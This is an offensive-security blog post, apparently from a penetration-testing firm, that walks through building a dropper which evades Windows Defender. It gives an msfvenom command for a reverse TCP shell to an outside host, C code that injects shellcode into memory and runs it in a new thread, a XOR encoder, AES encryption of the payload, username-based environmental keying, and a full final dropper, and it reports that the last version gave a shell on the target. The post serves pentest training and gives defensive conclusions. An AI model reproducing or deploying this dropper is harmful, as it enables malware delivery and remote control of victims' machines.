Jack O'Sullivan
May 4 2021
Antivirus (AV) software is often the last line of defence against malicious actors. When a spam filter misses an evil attachment, when the browser fails to warn us about the low reputation of a certain file, or when someone at the office decided to ignore all the warnings and keep clicking “I understand and accept the risk”, the AV is the one put on the spot to determine if that executable that is about to be run can be really trusted. But how much harder is it for an attacker to infect a fully patched Windows computer with an active antivirus solution than one without?
In this article, we will improve our understanding of the level of protection offered by Windows Defender and see how basic changes can make an off-the-shelf malicious payload to fly under Defender’s radar. We will explore some obfuscation techniques to disguise shellcode produced with msfvenom (a generic payload generation tool from the Metasploit Framework (MSF), easily identified by consumer-grade antivirus products) and see how Windows Defender performs against the different tactics.
We will do this in an iterative manner: Starting with the raw shellcode being injected and run from memory, the code will be improved in various stages by disguising its final intention with various methods.
1. Simple shellcode loader
We will start by creating a simple payload with the help of the MSF’s tool msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.3 LPORT=445 -f C
Now let’s create a C program that will inject the shellcode into memory and spawn a new thread that runs it.
First, we store the resulting code from msfvenom in an array:
unsigned char shellcode[] = { 0xfc, 0x48, 0x83, [...] 0x89, 0xda, 0xff, 0xd5 };
The snippet above was edited for brevity.
Then, we reserve memory space inside the running process. This space will later be used to write our shellcode. This is done by invoking the “VirtualAlloc” function of the Win32 API, which returns a pointer to the beginning of the space of memory reserved.
LPVOID basePageAddress;basePageAddress = VirtualAlloc(
NULL, //LPVOID lpAddress,
(SIZE_T)sizeof(shellcode), //SIZE_T dwSize,
MEM_COMMIT | MEM_RESERVE, //DWORD flAllocationType,
PAGE_EXECUTE_READWRITE //DWORD flProtect
);
To better understand what we are requesting to the Win32 API, here is a breakdown of the function parameters, extracted from Microsoft documentation:
- lpAddress: Starting address of the region to allocate. If this parameter is NULL, the system determines where to allocate the region.
- dwSize: Size of the region in bytes. We get the size of our shellcode with the sizeof() function .
- flAllocationType: Type of memory allocation. With MEM_RESERVE, we reserve a range of the process’ virtual memory space, and with MEM_COMMIT we tell the Windows API to allocate that reserved virtual memory to actual memory space. This could be done in two separate steps, but VirtualAlloc allows to perform both operations at once by performing a bitwise OR operation on both constants.
- flProtect: Type of memory allocation. With PAGE_EXECUTE_READWRITE we request permissions for reading, writing, and executing data in that region. Initially, we would only need read and write permissions for storing the shellcode in the process’ memory, and later only read and execute to run it. This approach would be safer when attempting to avoid detection, especially against more advanced anti malware solutions. In this example, however, we ask for all three permissions at once for the sake of simplicity.
Now that the memory is allocated and we have a pointer to it, we can write our shellcode in this space with the “RtlMoveMemory” function.
RtlMoveMemory(basePageAddress, //VOID UNALIGNED *Destination,
&shellcode, //const VOID UNALIGNED *Source,
(SIZE_T)sizeof(shellcode) //SIZE_T Length
);
We will execute the allocated shellcode by creating a new thread with the function “CreateThread”, which returns a handle pointing at the newly created thread that we will need later.
HANDLE threadHandle;threadHandle = CreateThread(
NULL, //LPSECURITY_ATTRIBUTES lpThreadAttributes,
0, //SIZE_T dwStackSize,
(LPTHREAD_START_ROUTINE)basePageAddress, //LPTHREAD_START_ROUTINE lpStartAddress,
NULL, //__drv_aliasesMem LPVOID lpParameter,
0, //DWORD dwCreationFlags,
NULL //LPDWORD lpThreadId
);
According to the function documentation at Microsoft, the function parameters work as follows:
- lpThreadAttributes: A pointer to a SECURITY_ATTRIBUTES structure that determines whether the returned handle can be inherited by child processes. If lpThreadAttributes is NULL, the handle cannot be inherited, which is not relevant for our current purposes.
- dwStackSize: The initial size of the stack, in bytes. If this parameter is zero, the new thread uses the default size for the executable.
- lpStartAddress: A pointer to the starting address of the new thread. Here we are passing the pointer to the beginning of the space of memory we previously allocated and wrote. This is what will allow us to execute our payload by telling the new thread to start executing at the beginning of our payload.
- lpParameter: A pointer to a variable to be passed to the thread. This could be useful for more advanced scenarios (e.g., a self-decrypting shellcode that receives the key as a parameter), but not necessary for this one. For that reason, we will just indicate that we do not require any parameters by passing NULL.
- dwCreationFlags: This controls the conditions of the creation of the thread. For this example, we pass zero to tell it to run the thread immediately after its creation.
- lpThreadId: A pointer to a variable that receives the thread identifier. If this parameter is NULL, the thread identifier is not returned.
Before ending the program, we need to wait for the new thread to spawn. If we reach the final “return” statement the process would be terminated, as there would be no further active threads. This is achieved by employing the “WaitForSingleObject” function, which waits for an object to enter the signalled state.
WaitForSingleObject(threadHandle, //HANDLE hHandle,
INFINITE //DWORD dwMilliseconds
);
We pass to the function the handle that we obtained when we created the new thread and tell it to wait indefinitely for the thread object to be signalled with the INFINITE value.
Trying to save the binary to disk in the target machine raised an alert from Defender. As expected, it quickly flagged the binary and identified it as a Metasploit-related attack.
2. Encoded shellcode
Now we will write our own quick and dirty XOR encoder to avoid detection from Defender. The following code applies three consecutive XOR rounds with bytes 0x42, 0x43, and 0x44 as keys. We arbitrarily chose the number of rounds and the characters to encode with to ensure that the encoder itself, as well as the payload, would not have been signatured already, as it happens with MSF’s default encoders.
void TripleXor(unsigned char* buf, int size) {const char encoderChar = '\x42';
for (int i = 0; i < size; i++) {
for (int j = 0; j < 3; j++) {
buf[i] = buf[i] ^ (encoderChar + j);
}
}
}
In our new iteration of the dropper program, we use the same function above to decode the pre-encoded payload. Then, we inject it into memory employing the same technique previously described.
unsigned char shellcode[] = {0x20, 0x5e, 0x4a, [...] 0x91, 0x0a, 0xe3};TripleXor(shellcode, sizeof(shellcode)-1);
// Allocate memory
LPVOID basePageAddress = VirtualAlloc(NULL, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Write memory
RtlMoveMemory(basePageAddress, decipheredBuffer, (SIZE_T)size);
// Create thread that points to shellcode
HANDLE threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL);
//Wait for the thread to run
WaitForSingleObject(threadHandle, INFINITE);
The encoding applied to the shellcode made no difference to its detection. Again, Defender caught this new version it as soon as it touched disk.
3. AES encrypted shellcode
Defender was smart enough to detect the intended behaviour of the program with static analysis, even when the encoding used was not likely to be signatured. For our next step, we will use encryption instead of encoding. Our aim here is to double down on our efforts of hiding the intention of our shellcode, making it harder for defender to predict what will happen from static analysis. Moreover, encryption will change the entropy of the shellcode in a more drastic manner than encoding, which is something that could also be signatured.
The golden rule in infosec is “not rolling your own crypto”. Cryptography is not a matter that should be taken lightly, and a lot of things can go wrong if someone that is not a cryptographer tries to come up with a new encryption method, or even attempts at creating their own implementation of a well-established method.
Luckily for us, we can use libraries that already implement these methods. We will go with an AES library (https://github.com/SergeyBel/AES) that will provide us with a strong and standard encryption mechanism that is relatively straightforward to use.
This AES library, however, does not handle padding or out-of-bound errors. It assumes that the key is the right size (16 bytes) and that the data that is to be encrypted can be perfectly divided in blocks of 128 bits. For this reason, we need to add NOP codes (0x90) at the end of the shellcode until the number of bytes is a multiple of 16 (512 bytes long in this case).
The code to encrypt the payload looks as follows.
unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a,0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };
unsigned int outLen = 0;
unsigned int size = sizeof(shellcode);
AES aes(128);
unsigned char* cipheredBuffer = aes.EncryptECB(shellcode, size, key, outLen);
aes.printHexArray(cipheredBuffer, size);
Now we grab this output and place it as a char array in our new dropper, that will decrypt the shellcode before injecting it into memory. The key is stored as a variable in the same dropper.
unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a,0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };
unsigned int size = sizeof(cipheredBuffer);
AES aes(128);
unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, key);
After compiling this new version, we were able to download it from an HTTP server and store it on disk, which had always been prevented up to this point.
Executing the binary does not trigger any alerts either, and rewards us with a shell to the target machine.
4. Environmental Keying
Even if we achieved our initial goal of avoiding detection by Defender, we should bear in mind that this naïve approach would probably not suffice against more advanced AV products that will analyse the behaviour of the binary at runtime with features like sandboxing or in-memory analysis.
As a bonus improvement to our dropper, we will use information present in the target environment as the key to decrypt the shellcode. In a more advanced scenario, this can be used by threat actors to ensure that the malware will only run when it reaches its objective (https://attack.mitre.org/techniques/T1480/001/), protecting their code from malware analysts and sandboxes. For our example, we will just use the username running the binary as the key to decrypt the payload, as this is simple enough to implement and test.
As explained previously, the AES library assumes that the key will be 16 bytes long. For this reason, we need to pad our key if the username is shorter or truncate it if it were longer.
#define KEYLENGTH 16
unsigned char* generateKey(unsigned char* username, int username_len) {
unsigned char key[KEYLENGTH];
char padding = 0x01;
for (int i = 0; i < KEYLENGTH; i++) {
if (i > username_len - 1) {
key[i] = padding;
padding++;
}
else key[i] = username[i];
}
return key;
}
Now we encrypt our payload with the username that will run the dropper in the target machine.
unsigned char username[] = "IEUser";unsigned int outLen = 0;
unsigned int size = sizeof(shellcode);
AES aes(128);
unsigned char* key = generateKey(username, sizeof(username));
unsigned char* cipheredBuffer = aes.EncryptECB(shellcode, size, key, outLen);
printf("Encrypted payload:\n");
aes.printHexArray(cipheredBuffer, size);
We then save the encrypted payload in our dropper and extract the username at runtime with the “GetUserNameA” function. Finally, we recreate the key used to encrypt the payload with the generateKey function before injecting it into memory.
CHAR username[UNLEN + 1];DWORD username_len = UNLEN + 1;
GetUserNameA(username, &username_len);
unsigned int size = sizeof(cipheredBuffer);
AES aes(128);
unsigned char* key = generateKey((unsigned char *)username, username_len);
unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, (unsigned char *)key);
We should highlight that this code will attempt to decrypt and run the payload even if the key is not correct. Running it on an environment with a different username could corrupt the process memory and even crash the system. In a real scenario, the dropper should first test if the key is correct and then decrypt and run the shellcode, exiting otherwise.
The final dropper code looks as follows.
#include <Windows.h>#include <Lmcons.h>
#include "AES.h" // https://github.com/SergeyBel/AES
#define KEYLENGTH 16
unsigned char* generateKey(unsigned char* username, int username_len) {
unsigned char key[KEYLENGTH];
char padding = 0x01;
for (int i = 0; i < KEYLENGTH; i++) {
if (i > username_len - 1) {
key[i] = padding;
padding++;
}
else key[i] = username[i];
}
return key;
}
int main() {
unsigned char cipheredBuffer[] = {
0xa5, 0xaf, 0x30, 0x3d, 0x34,
[...]
0x95, 0x37, 0xf8, 0xf1
};
CHAR username[UNLEN + 1];
DWORD username_len = UNLEN + 1;
// Get username
GetUserNameA(username, &username_len);
unsigned int size = sizeof(cipheredBuffer);
// Generate key
unsigned char* key = generateKey((unsigned char *)username, username_len);
AES aes(128);
// Decrypt Payload
unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, (unsigned char *)key);
// Allocate memory
LPVOID basePageAddress = VirtualAlloc(NULL, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (basePageAddress == NULL) {
return 1;
}
// Write memory
RtlMoveMemory(basePageAddress, decipheredBuffer, (SIZE_T)size);
// Create thread that points to shellcode
HANDLE threadHandle;
threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL);
//Wait for the thread to run
WaitForSingleObject(threadHandle, INFINITE);
return 0;
}
5. Conclusions
Today we avoided being detected by Windows Defender. It was smart enough to flag the shellcode even after encoding it, but a robust encryption mechanism was enough to prevent detection.
This approach sufficed to avoid detection of Defender. However, enterprise solutions would most likely still flag it as suspicious, as some of the techniques used in the final binary such as the memory injection, or the execution from a new thread, are well known. Plus, the Win32 API calls they require in this example are monitored by the more advanced AV solutions. Moreover, inspecting the memory of the process would reveal the unencrypted payload, which is heavily signatured, as we have seen.
This illustrates an important point: Commodity anti-malware solutions are designed to stop most threats, but a highly-resourced attacker will not be stopped by them. These products are designed to protect regular users in their everyday activities. Corporations should look into more advanced solutions if they want to secure their assets against advanced threat actors, for whom, bypassing Windows Defender is possible.
Want more insights from the team? We’ve got you covered: check out Secarma Labs’ Twitter for more offensive security musings.
If you’re interested in developing your pentesting knowledge, we’re running a series of Hacking & Defending security training courses, where you get hands-on experience in ethical hacking. If you’re interested in bypassing Windows Defender, this could be the course for you. If you’d like to get involved, check out our Training page, or contact us here.